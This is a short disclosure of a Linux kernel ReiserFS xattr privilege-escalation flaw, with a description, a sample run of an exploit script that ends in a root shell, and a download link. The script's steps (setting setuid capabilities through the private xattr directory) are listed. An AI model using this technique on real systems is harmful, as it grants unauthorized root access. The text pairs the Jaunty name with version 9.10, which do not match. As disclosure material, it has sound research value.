Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
Jon Oberheide
http://jon.oberheide.org

Information:

https://bugzilla.redhat.com/show_bug.cgi?id=568041

The kernel allows processes to access the internal “.reiserfs_priv”
directory at the top of a reiserfs filesystem which is used to store
xattrs. Permissions are not enforced in that tree, so unprivileged
users can view and potentially modify the xattrs on arbitrary files.

Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell…
# id
uid=0(root) gid=0(root) groups=4(adm), …

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.

http://jon.oberheide.org/files/team-edward.py